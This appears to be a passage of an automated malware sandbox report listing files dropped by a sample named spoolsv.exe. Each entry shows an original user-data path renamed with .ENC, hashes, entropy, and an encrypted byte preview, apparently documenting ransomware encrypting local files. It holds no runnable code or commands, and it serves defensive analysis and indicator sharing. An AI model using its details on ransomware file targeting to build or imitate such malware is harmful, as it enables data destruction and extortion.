                                                                                                                                                                                                                                                      Preview:..G..n.......z.....g..5,do....... ....T.7%@.......7..S.L.^<.8.Ph..........5.{8.s..h.b.VwL..e.QR.o.. *.`C.|...hS..P..|.]...8.-.as..jo...Q..e....e......%15)....~.yL\.t@.4P...-..c.......J.......... ..3.....vg;..$..!C.6W.....~...Z..T+......y....k].....-.}.(..>X......v......w..fR..I...8........"....RQ...c.......K."-O..^C!A.......R...0...$.,w.._.t.]...X.N.......o..ho.....D..{V.{.........";....`p.....i.../P..._.J.*E..RRyd.P`..e...z5..4.o.S.Jb.|...y.}.4.P.p....?.(...g..hmx..@!...VAgA2R9k......JPS.^>[....3V.y......@r.}..|..{...jA....k..+..5t..+g....44....7d.8.C+......aVCC%.#..@...#.56..;....R...FJ..f...b...>...85.P9..,......Yca_..'..MVZ..]..3..@).{3Q8h.0....u4.s.I1..o.\..8..$.8.a....F..m..B.V....#'.6....c....u.X.E..J. ..Z.....Mwb.Jt[...!.....T...'...z..`.QM.8-.......[.1>.V...c...>...V.{..HFJ.g.(rYDH:5. ....TD...P.".k\.jb8<..8........z*W..M.\c.>.cm..]."../..\......L..[.Oi.. ...........cl.1......2.9Xd...(...^=....N/i..9.....!.q_W%;0h>b &..KN.a.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):237408
                                                                                                                                                                                                                                                      Entropy (8bit):7.9991725309490285
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:lE70IVPQtomH5f9mGT+0vr1fmFHfiON9PIWwt8NRWGALUdL:lq0YYtsV0ZcvQrufWtIdL
                                                                                                                                                                                                                                                      MD5:9CDB0ADB1E297661B6D81E0AF0A6E300
                                                                                                                                                                                                                                                      SHA1:C661DD92218CAE5EFE0D3BB073FEBA661F9DCA83
                                                                                                                                                                                                                                                      SHA-256:D16C0DF6FD62FBF826ADE6C3E58CA4A6FC54F0ACC6116DEE56F29753E1B72187
                                                                                                                                                                                                                                                      SHA-512:0F0A27F0F7551EC823E630DA83B5CB915EF2137E10F108871987F83AE948B5C9C956F7D848B80D468A9D7FEB37AACC5D7DBF2A0BE52433DAFAF385FFAABA4B1E
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......zi..1p.$...'/.......Bj.2.R-bo.k.<:"E..~%..d..LF.lX.9...j.L....`2..V.W..j.......m.&9...Q.....W.N....B.Q..?y..dw8..E..M.eu.....-S(.)......>)...,..).).y.3.:.......... >..! 5.9.L.+..m...}-...Mk...lw.G.\<.#..a.].$..\.(y;..?..3.?a....\X.R.S.7K..!ju...N.........tO^h.'}......K.;...n..e......[.@.w.......T[.....s..>..k..(CCl^...N....V.q.c..;..^...q.d.c.J.....'~b.?'.@.d.. ..4...}.!FSnGu;.s..B.NB}..C.q&.H...x...8HG..I.[A..s^...$ ..h.\q.#m.m.4!W..P...2(B~.....g.2?...+..{32.B.<...@.9.B[...].J.n.....|)..R|..qD-.;...Q..s.<~.4...DI..\2.jZ..s.....n...7P.X3.L.........|.0........n....C...r....V5d..g..p..X....`o.<%.o .......?7?......l..:,19...Z+.M..l^!.......g...2.D..*.M..R...VT.."].X..}[.T". ..;.F......"Bk9...>....^}&.U.v*b.+...G.....j...>.y..l...... ...)l...3..b'...C......A...r...t9bpM....7......-...\\K..G../............p..d.[.....FIi.[,.}|@.1..[.....+.d...>.....F|.M.........$.U..%.C..-.I\..f.....'9..A...#+..C...+dJ....d..0m.1....R..%> ;D....g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):240384
                                                                                                                                                                                                                                                      Entropy (8bit):7.999201030716893
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:LPVKnzKr1m7Qeu/k8hbtCu4l7Q/d2U6UyjCdFt0Zr:RxmQeu/lbtj45IYPoQt
                                                                                                                                                                                                                                                      MD5:B438D08B19F2FE2563257B53C6E6408A
                                                                                                                                                                                                                                                      SHA1:D314AF584D57DB209FCAEA78042A9D57DD763162
                                                                                                                                                                                                                                                      SHA-256:B246C51186C37EF7354A3EE29BBC73AA796176FD5AF9B1F2153ABF8BFCF4A32B
                                                                                                                                                                                                                                                      SHA-512:BAACDC224C1679B6B83D06F93E65649998E427468C7BAF63E4111A8989BDDF868131FF403B2FBAE010EA5E8CF5DEC34D89DB01142375D08BB5ADAC6C0EFEE001
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z.),.2.p..&&1..m.MG.......}..0.R^..kq.~.?`$.8..yJ`....t...z.h`e.;.Y .F?%.........0..|........O.P...e........tcv..B.......!.....A`.F'.g.8bGLe.N.{..<C..m2H....../...#.^k{..u.DNh.Z.2.A.I..E......8.zk.4..l.j.....ho...z..N.......7.../....sJ.3!).zh.Q.:.S.......*m...y.@.3x.jW..1..c.)...S..{.I..a=q.@&..&..&@....GQ...j.u...;odR.....T.>">O.Ig.z...........S........B/.,g.up.}...Vmu....I......."8......a...f.Z4.z..v.A.by.=D.TOWL.]..:c.k...y[J........N...*...B..H+..7.^JtC.......O...{. .\..P.....?5..^],.o.9^:....K.....d.....fn..#...D.(D..E?.+Uq...4..#~+%=u.^..$.(2...c.R.%'!.....L C.NA(.=...I....^..._...-.".{*..Q......h...%P7.S.!.|.Jh&.G.Z..F#..!...N.-.i?L.H..b.g......R.E.7....G...>3.b....=...(....%....9.|..S._..>.|.Y...v.{8.S'....n*F.].....Ol..h..x.<..g.*..|_3...^C.]4{......N.0R$VC/.y4.T0.0..s.n.J..U6&.I.^.....<...+|...f}.t....}b .3.&{.....?_?."..omc..@.t.!....._.....2".S.`.M.,+J`..d...]..]r..E_..V.*.?...K.<uSx..\J..I..R/....4.3..[7`...R..V.iH..q.'DaO

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):758848
                                                                                                                                                                                                                                                      Entropy (8bit):7.999763068811911
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:F7ave1mo21uDPw8bImKh3YgOBq1kKrJG+iNGaG8PbIBSRyOmvFRC29:FGAmA4IKh3Yzw2kJG+i4afbIOmvFRT
                                                                                                                                                                                                                                                      MD5:175658C7B5A7D69E5E7AA768B8515FC2
                                                                                                                                                                                                                                                      SHA1:C5B29F78E10F9CD02FD219A98685132CBC601072
                                                                                                                                                                                                                                                      SHA-256:779306E9AC1746D6CF98BB89DF732FA75365C89CA4C31550B6321EA739A05018
                                                                                                                                                                                                                                                      SHA-512:D0979040F88BAF3660CA5AE8EEB608680D65CFC8875724F49A6D89C3B222B496053A386616798320AD09D02126E3C94DDCB4B51247ABA31170F81553414BBD48
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..D...6}....A.^.[....g.Mtv$...b.{c:..-#,,.)Bm....3V..%F....t....O.`o..?[.Q~m.6*..X..T.Mq..;.M..(*.!.h.!...A% .&K._..8..3.]..d..p..:V.....7.o..}|.W....F+...m@..0..&;(..F.)....7.a...X.j..."xs...A..-.8D-.k........7.....C..ht.%C5......N}..^.M{.....~A^6_.DX@d4..].B.?\.x.. ..........~.......v....\.G.......j.^..|....."~....k.a".....,...:..x.&2=..... .BiM .%:..C.._..L....t.U..'.t.(.....@1.......o9.=.YB..Ywz..8.;./.=..i\.a.....Nm..........P..e.......xX..d.Aj..m.{Z.O....=.x...S8"4..<;b.k..B|}....F.8..Q..'.z..l./..(..m9f"..G#kW...V...I^...9..Z...Oy<..L.f.J...@.H8.#w.F.UNb..J. e@.}c.8d...D....D.u..l...a.a.?.I..............z.<.P.......Mk,&..^...........xA.Mq.....-...&M...'.1.R.Ia^.O!#...O"...x.U..Nh.......e......Rd}ox.$..r......9.w...*...g(..\Gl.|c..M..ib.VV..R..V.w.t....z4.)C...?'3......7;.>..?...=['.D.s.$V+...^.?......2.....gg...FE9..3.t.b..0..S` c.i"u..1.....1...o.d.......$/...~|....D.|..{.p.8....x."..R.3..j.t..'_..*..W'.....Hw...h..S.|.iic...J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):582352
                                                                                                                                                                                                                                                      Entropy (8bit):7.999666557408231
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:+2XInYAZATL7SoergqAJGH2hRUN2TWuK2/nqe+7MBXxKkh9:+2XmfZATXSoergqAfUESSqe+0r/
                                                                                                                                                                                                                                                      MD5:F90A702CC26538467FBE3BE4137C4683
                                                                                                                                                                                                                                                      SHA1:3EC578B52DC1F5982BAAE5C4ABA4883FDB46D86A
                                                                                                                                                                                                                                                      SHA-256:6287F7368CEC42474089C2EFB192BE53A678D630B2FB9E8765FD2938461DEC7C
                                                                                                                                                                                                                                                      SHA-512:C602073523820F5910D20D2292ED59B3CCF37218511A8233877EE25D00F3EA9F0AFB81BDE83A43E50D42818B42B2432923D72322A5E5B91446E56C0EC65126E2
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.._s..L.....P..Z~t..Y...).z.>.C.z.C.`<..0Y.G.....[.W........?....[4...x.}...jh..~3..a....W.a.ej4(q...W.V.Z.q=K%.]O.v.N......TP.....%...0.V..f.....s...r[.l....1/..|.g..g..Dh...O.N.9.e.o........".<..L....'....?.....I.4..p:.T...(......=..&..aY.....P......h\....r.h..D...r6<...4.qL..\.......+..M.&.y.r..!.U..@|..0]Bj.. A:q.7...8...*..c...x~.Y.......a....0.Iz..B..@...Lo.......N.j.E8...2.f....3J[..O/..XP0.L.Z....}...(.P......Dh...%.?OO.^+;bo?3q,...A. |i0.#x....<.;@.......@.XH.G/.9G..K:S.z...+.h$.A4(.:..j..z. ...^..d..c.j}#.K.-fT0t}..Us..;.k, H....O...J...j..\....e....[2..........`.J.......L.?..q..k.o.....m.....s.PM.N..t}!.>.....R..`....O;..(}yK.lZZ..R......z...r...<NN.r.s.|.X..nlL....>....8_.T.bG...8S.a....\..o..`(..D[..&./.T..LO..?..1.0D.H.|...;..O\...\.Y..b.ZmJ".fs..;.f*j....'7..V...6........[R..z...H.8....E.\%...E.+.[....r.....$.&..\.S.M...bF....l"49.~5Rd..Y..W.K......eM..|.^........(4Bh...d..a.D^[.Hoi.X]m...+NZ..I$|...F....}.[WjZG......?24n^......f..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3056
                                                                                                                                                                                                                                                      Entropy (8bit):7.944608027021052
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+omKoVhFwY3aBPKwcsNYrG8cEiRfN1xYb9tbCO/XCCNvZSt+OeS0+S57P9geEEGl:+lPVhFwYWrcsKK82REtbx/SCNvZSt/eW
                                                                                                                                                                                                                                                      MD5:8331CE5BC1D87CAFED0A727052E044BF
                                                                                                                                                                                                                                                      SHA1:856F04B49964E6D9392E87130A17809B59F20FA9
                                                                                                                                                                                                                                                      SHA-256:BAC54F8783D265FBFA4FC0A816297540D27213ADF36F077EAADE1A9DE62B8BE7
                                                                                                                                                                                                                                                      SHA-512:D7929CD56A7507DCCFBAEBA58E5C18C82F08CA606416CB948B3D47656631CF0929DFA2EB5668082103778B27891852E290ECDDE32653D4A50E7A34990C2D26E6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I...P\cB*.KEW....)...|.">.9.zl2)...EA...u.|...*q....$ W.....ff.......g...c..O.... ....I{....&..+'j...<.....~.Ta.....KB-4....En.E....7...id.Z.....q.^.-..Y..V.$.Y....o.....zw..}..'~\<.A...$.;.....;pN.7.f..[......X.2.....| ..C..M.....I...]..a.....4.>.].....\US.Ox].../w r.....=.M..b..N.I.A...W..Nf(zrR........[...\.......AZ....;....Zb.s.1..j............pE{..&.v.{..I......C..}...."...e..;[*.:.h.3..\...[..>f.k._|....-..G..W..Dr...;.........4.oh.oC.].K]Sy....^.Y.fV.*.:Af~.H..R)..0.ln..Q....r...TD!.....gR..,..~....\.....s.0...;...h.6G"..<5.EY7.!C.k].....L....[gK.&7.?;....Q....69Y....G'..2...)C..@J.ou..Nb7.....'...n...~*.......o!...7.!z....<.D1....&_.|.u/...@...[...m...@.....(..*.2^..B.(d.G.5.......c...0.z........2%.<....i.`.>X.hsR\...V..]h.Vif.AI...K.%.;..,&...........0.D7.eZ]...t.W1..!.C8..y.-I.*....}.K..E...9..3C.S..~..[..c..b.!...BB}."$.W.0.....,.....j....Uj.I.....W|.Z....B...._5......./tu...Y..V.........WT..k.....o.)d

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\0015DD4A\10_All_Music.wpl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1072
                                                                                                                                                                                                                                                      Entropy (8bit):7.803361915513025
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:KySHfz6wnsZH4QTJMKCbRaQfgDQgBPwe+Dh23W7I:PAnsZH4QTlxDQRe+Dh23CI
                                                                                                                                                                                                                                                      MD5:995A1F66783C93DFC35618EC698B0744
                                                                                                                                                                                                                                                      SHA1:8E099A645196F9A55DB73C930F33576BA1389A0E
                                                                                                                                                                                                                                                      SHA-256:3263E3747E15065EA71FFD2B81DE28590202B36389200FF8B3614AEFFA1854CE
                                                                                                                                                                                                                                                      SHA-512:4DD09C064C1A1AB1A689C05627668ADF02ADD52239DF6AA170326F526BC306D8A4D9AEA4F25F355C7DA6CBCA7D56477FE7343BC4F0F084C588F5AD02FE251D8C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.4k..D.Tg....7U@.&A....."{.l.....3Z.Z.!....).HJ.,.U..$..i.5aQ~7.3l...a ..o.Z.L.....$........^n........[^.@O%...wX^........i8.(.*...?B.?..;..P..$]....m........A9~hO..u.).....Q..gV.l8....}R..'.U]...G.. .#.z.Y ..B.X.f.hb[...4..O.#i..p.v..'..r..4M5F-.U~...2>.]e.?..[^l/.........0.+<%.....|.e.u.G.v......s.."..).-i(.........R...*.O......>WPKA]|...n/..a..L...6.7Y......_.$.......2...mD.*......t.U^5..e..f."3..+^.3.....3.....w9...V.E.{.........../.5l..5.........2..C.KR\...D'e."nc.....w..........8..ee=..7...N.......f...0...'......&.7...eD....|.F.U9...."o.sb..............I..F...P.F.M..M../..e.`.S~m..W9.?!!..l..k.Z....?./..7....C.F.FE.*}...%...`f.......LAh.x.T..7....6|....X.aQM.f...K".....8;..v.X.2hf[M.+k...F..$[ .....S.._b..v2.lr...L......._{..x......e......?/.M....q....A.~.M?.......&.<.C.....c._..D...0I..X.3.M.....j*.C.q...p..vO..d..mc..{....!O....?/.r%....1..x.+~RPm\..BNmr.tuR*VO=..B3.m.3,~.HF............{?[..9Ar...'|8j8A..0.2.....Wj.{1

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\0015DD4A\12_All_Video.wpl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1088
                                                                                                                                                                                                                                                      Entropy (8bit):7.848816113515909
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:KySOJRXUoA09Wul17IGUE2vufPGblrBEx2fGQZhbP0KRpkmepR+k/GvX:PhLA9onUIfPG51JZ9MKH5vX
                                                                                                                                                                                                                                                      MD5:71812BD2D11A584B76B6FA8DCC9F2EC2
                                                                                                                                                                                                                                                      SHA1:6271DC4C95210E404374F71A0DD95F593AEE04C3
                                                                                                                                                                                                                                                      SHA-256:DF90205DEAB9D65E5BB74EA1DAD1BFBD7E847EB1838BEF3814597B136C079183
                                                                                                                                                                                                                                                      SHA-512:39BE1A6BD8F430D145B564440D3C46019DA4BF14268E5EFEEA67DD0B089446C6E2CEA68F3E44372DD00C27E1B2E28C12AB766654A9943F76E85975F14041C311
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.4k..D.Tg....7U@.&A....."{.l.....3Z.Z.!....).HJ.,.U..$..i.5aQ~7.3l...a ..o.Z.L.....$........^n........[^.@O%...wX^........i8.(.*...?B.?..;..P..$]....m........A9~hO..u.).....Q..gV.l8....}R..'.f..CY8...~....O9......Wp..5.K.h.K2+.p..!j...B.My.uV.uL)....h.........,0.C....SCh9...D.J"....A.j..Z0..rq....~.J.......z.x..2S...^^/+..}=..g}E..J.t...&9...|w........uB........Dtx.....!..5Wz!.2.\.>e....f.&....1y....s.M.e...S......(a.v.Q...(...ZU#..x3....vma.%...O?|Q.X..b.T...r.=.J.X.p1 6..C.O.....N8E...@mk. e'..D"....%..E.#.@...\..ZM....x.i...s..o.A...5{Q6.D2..ZR......1K.-&......Vg...5....A8c...F....x....`..JP.=.....d..>......I6z@......`. .-....6-.&s....v....;O..._.+H.W.....,..I.......T.c...P...20..cH..pY....o.G........h.. ....h..A..65R.6.st.4.*.F.r5.Y..>....EL.....$....#3r.=:OP.\E.........0Y......;".. 9."L....w.O.1..2?.1N.aw........kk.h2.U..G..e.O.;N.)..."$..j...P......w...i..oS.]^.._......F.;.?.mA....h.."..C.*.#....jr.._.,5..?.C.9...........A.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2032
                                                                                                                                                                                                                                                      Entropy (8bit):7.907617392225902
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:LryMojxA5/WMDkA8OvHXEaNza99uQkaunSsh1r/D:vYxwXkA8C5ZHQklSsh1rL
                                                                                                                                                                                                                                                      MD5:3F6E183085E97703C06C1AEBE088C337
                                                                                                                                                                                                                                                      SHA1:1DCE277BD3706727F8193017E1695FC99A37B64D
                                                                                                                                                                                                                                                      SHA-256:7C690AA14B90B8796EA164EFA90B24746D56C7D43ED375079B4589966FCE3F99
                                                                                                                                                                                                                                                      SHA-512:AF7E14FDA183D6F8449C5BB617B9DE847C8B778AA45568EEEC9728FD31E754FE7FC499E1F5F5011BC772CD883D7689E84784B4654D5034A547018CA108B5EEBC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:qu.(.m..|.,...p..y7.}..o.#..$N....."..M......]I../:))E&(s..9.L6..)9.[.n.)..c..?]..*.Y.|r.d...M.......e.d..%.m-..(.....+{2*..S.....*P....F.5..F.~5$.ng4 ..G.<.=..+/ .!<..5...x(.rL.....f~.......X..r...<.k./..........;...&....D1.^."...j..r^...[1.#R.>H.0..tOvz.E..|.$..[fnb....... Y..>.....2./....F..uL.$..Z.W" ..JJ.9.Sl.A.y...). ;L~.l....,<.#..((..P....y.6],:..A\.".P..\.......]7K.?.G..M'..P.>znc.@..X2........4J18u....C.V.*A...(q.Y.*'.0O........c|q..|..v}.>.....z.J.M....5.*..b...em...?.v(.6..cf...f..y.[.....J..s.xE...V ...m...F..}..:......J.....j..E.=.r..sZz'O.......D.33(..a*#..;.4..)..~e._........z.6.,t[@.eKW.8.F....Q._.2z2...*n.?Z8\..?..!*.9.[..Av'c#....z........,M.cC.H...5..##Y.S.9t.R...C..n]...p.....f.H~N3J...s.........<...(..KV......Z/v.G/EQ...R5;....Gva8..&H....\..Pv........Il. !.#Y.(d...z.... ......{......;@c.T..N>.....#.9.2.{>....S..;....7......Q.K.c..a.c.8P;..C../......b..-..DR.`=e..`.M*.j..M...0:.MpL...].S.j..3.^y.......{..D..].8.i

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                                                                                                      Entropy (8bit):7.70071629236211
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:WBjBTmeuSPwCKlfvQycI2Ex/A0qGZVi7chUy/284YzAnyq+WEIeGhD7fKQ4:WBNqeurTQycI2301hUye80yq+pEyQ4
                                                                                                                                                                                                                                                      MD5:9F18FC63ADF2F06B527DEFC4F1A76921
                                                                                                                                                                                                                                                      SHA1:841A58E8255C3610AA5AA58C927DDDC1770A5FCE
                                                                                                                                                                                                                                                      SHA-256:1EA20305C3104DAA0ECFC79E1192239646D8D0C1A954F31E8DB2D3641DC6DB03
                                                                                                                                                                                                                                                      SHA-512:FCE749A05B6487F2A2B368CF6629426B4C793DFBF8D6B045A59A9A6897CECE92EA6004345E8543328574CF4612B455619A368FF3A80A72A87BCC59EEE7936A3B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.I.q.U....x.xj,.&G.NU$v.qY....#..:...1B..N....a.....B.ln.....e....h... .T=......r(.._......b.....Y......Q.. .?..9..._p+.nS...hU ....u.tAH'p.8..N2W_.#..,......Q..]..{~.....*..@..8....}..P*.l9.)..Y,....I...A..8...r.K.a...G.w.G..L.V.......n.Q..d..x.CF....=.........E.w0M ....9....f0[.....PEU>Z..A.......G...~W...A._.+nL./.#....zn.....E.R]%...y..=...K..>.H.o...Z.Z..}..y..%@...........b.0..s*...g.H.+.k.-.R.F7G".]<.9K..G.F..pL.Lt.E..|y..".........D..S...#..*..9..@.U-...*....s.`..}%..<.p.r..#N_^...P.I....Z....M...W...)..gqD..J".....R)...\..........y..1...W...-k,$<..%H...j..g#.........V. ..@!.e...~]Q..*.......].Y.r....A.&S....@....%.#.0M...:....e.Q...(..L^.z.iK.H.h...r..d*.&o.C^#.yy..A.l...N,.dQzzC.......4%X.3.{...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:s++k/WE:sz2WE
                                                                                                                                                                                                                                                      MD5:63862591AB88828AEE9ABAE556B3CB5A
                                                                                                                                                                                                                                                      SHA1:6A5ADC6AE2E518C094BD32639534D66E6E20884A
                                                                                                                                                                                                                                                      SHA-256:49E8332169FD5F8BEE9EEFFFE353E73B914D0852DE6C6DD2FB93C1574F25153E
                                                                                                                                                                                                                                                      SHA-512:ACDFD60170EF0450D8F5F9E338EA430A62E256BB776A754243EC3416B9C05D596B4B830E517E4BDFCDE21135213BBC8E4B81DDAB4FB6BF5AA6CC2B189C5F902A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..5.F..[.M.8...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:s++k/WE:sz2WE
                                                                                                                                                                                                                                                      MD5:63862591AB88828AEE9ABAE556B3CB5A
                                                                                                                                                                                                                                                      SHA1:6A5ADC6AE2E518C094BD32639534D66E6E20884A
                                                                                                                                                                                                                                                      SHA-256:49E8332169FD5F8BEE9EEFFFE353E73B914D0852DE6C6DD2FB93C1574F25153E
                                                                                                                                                                                                                                                      SHA-512:ACDFD60170EF0450D8F5F9E338EA430A62E256BB776A754243EC3416B9C05D596B4B830E517E4BDFCDE21135213BBC8E4B81DDAB4FB6BF5AA6CC2B189C5F902A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..5.F..[.M.8...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\Insights.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):400
                                                                                                                                                                                                                                                      Entropy (8bit):7.441190526050192
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:auUVu41xlgh4b4Tr+6EFaAJVFIEy30Tb6MqEhB0M6h0RMkKaCE:SVxMOL64jF5e0TbnhMmMOn
                                                                                                                                                                                                                                                      MD5:9A3E51F3BF9AF60AF3FBB59B257465D0
                                                                                                                                                                                                                                                      SHA1:6C7E134D6C08E2C539FD4F45862AB6C04DF8DE4E
                                                                                                                                                                                                                                                      SHA-256:F71C7F20D06BE2235570995895AEE28C5FC44A0EEDA28A776076520E9646E4CD
                                                                                                                                                                                                                                                      SHA-512:8514E34B907A81B661D753AAA0B66DA11A80A541C50D2C65397119298C91FFE76499E8F355E666888797782DA315D5BDBB0D23444466AD83BFDBE5443B1510BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..K2.S].}`jW..b<......2}j..O.A...ZrL#6U..XX......'e.x...pJ8Z..LY..2Nh...Y.h....n.j.($..>.e.....1;z{x.v.=.+{..Y...(...<........`y..Pi+.I=yPZ.wr...'[.!p.I...x.K|.j..<.0...\A..,.{...`9g...d.zV....... .......G.yP..c..y\..6.v:.3..",....=:.QH.+...A.J......h.N...EN9.;...gZ[...+...z.QJL*......e.fT?..J..0v...........`./6C|V...L.~..n.)*UeV.C...w.a9....&.$....E.#..U....i.x(...L.\~...1u.4d..pGA.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120100v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1008
                                                                                                                                                                                                                                                      Entropy (8bit):7.784757308058819
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++lvCFOCtH9QDCaxqV6H2NjbY7YGP4TVWvOPVG5TYon4aueQn4W:++lvCQI9oxqVsdMGP4ZCKaueQn4W
                                                                                                                                                                                                                                                      MD5:02A2662F66F25575D6E75BAECCDD11AC
                                                                                                                                                                                                                                                      SHA1:7FB2C0A0260D7A928680E347F79D3971AC06174E
                                                                                                                                                                                                                                                      SHA-256:4CB974966FCC92CD2BC70D8CD51E740A36D496BA55F4C95F4412A8B9EFD7684C
                                                                                                                                                                                                                                                      SHA-512:E7F411928D5ADCE65C35F05DEB0681019EAE8F95845D562D70BA781668C416646922F79B83FC28A84688948E5CB4372D25BD56451AA91C14F5DFA9E9DDBB10CC
                                                                                                                                                                                                                                                      Malicious:false
